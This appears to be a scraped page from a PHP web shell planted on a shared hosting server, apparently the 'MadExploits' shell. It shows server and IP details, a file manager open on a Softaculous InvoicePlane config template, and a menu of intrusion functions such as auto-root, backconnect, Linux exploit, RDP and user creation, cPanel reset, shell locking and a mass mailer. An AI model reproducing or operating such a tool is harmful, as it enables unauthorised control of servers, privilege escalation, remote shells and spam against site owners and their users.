Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.14.249.124
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
invoice /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
459
B
-rw-r--r--
changelog.txt
2.91
KB
-rw-r--r--
clone.php
5.72
KB
-rw-r--r--
edit.php
4.18
KB
-rw-r--r--
edit.xml
447
B
-rw-r--r--
fileindex.php
315
B
-rw-r--r--
import.php
3.89
KB
-rw-r--r--
info.xml
3.08
KB
-rw-r--r--
install.js
942
B
-rw-r--r--
install.php
6.14
KB
-rw-r--r--
install.xml
2.31
KB
-rw-r--r--
ipconfig.php
1.56
KB
-rw-r--r--
md5
6.79
KB
-rw-r--r--
notes.txt
571
B
-rw-r--r--
upgrade.php
6.29
KB
-rw-r--r--
upgrade.xml
646
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ipconfig.php
# <?php exit('No direct script access allowed'); ?> # InvoicePlane Configuration File ### START HERE # Set your URL without trailing slash here, e.g. http://your-domain.com # If you use a subdomain, use http://subdomain.your-domain.com # If you use a subfolder, use http://your-domain.com/subfolder IP_URL=[[softurl]] # Having problems? Enable debug by changing the value to 'true' to enable advanced logging ENABLE_DEBUG=false # Set this setting to 'true' if you want to disable the setup for security purposes DISABLE_SETUP=[[setup_value]] # To remove index.php from the URL, set this setting to 'true'. # Please notice the additional instructions in the htaccess file! REMOVE_INDEXPHP=false # These database settings are set during the initial setup DB_HOSTNAME=[[softdbhost]] DB_USERNAME=[[softdbuser]] DB_PASSWORD=[[softdbpass]] DB_DATABASE=[[softdb]] DB_PORT=3306 # If you want to be logged out after closing your browser window, set this setting to 0 (ZERO). # The number represents the amount of minutes after that IP will automatically log out users, # the default is 10 days. SESS_EXPIRATION=864000 SESS_MATCH_IP=true # Enable the deletion of invoices ENABLE_INVOICE_DELETION=false # Disable the read-only mode for invoices DISABLE_READ_ONLY=false ## ## DO NOT CHANGE ANY CONFIGURATION VALUES BELOW THIS LINE! ## ======================================================= ## # This key is automatically set after the first setup. Do not change it manually! ENCRYPTION_KEY=[[encryption_key]] ENCRYPTION_CIPHER=AES-256 # Set to true after the initial setup SETUP_COMPLETED=true
Close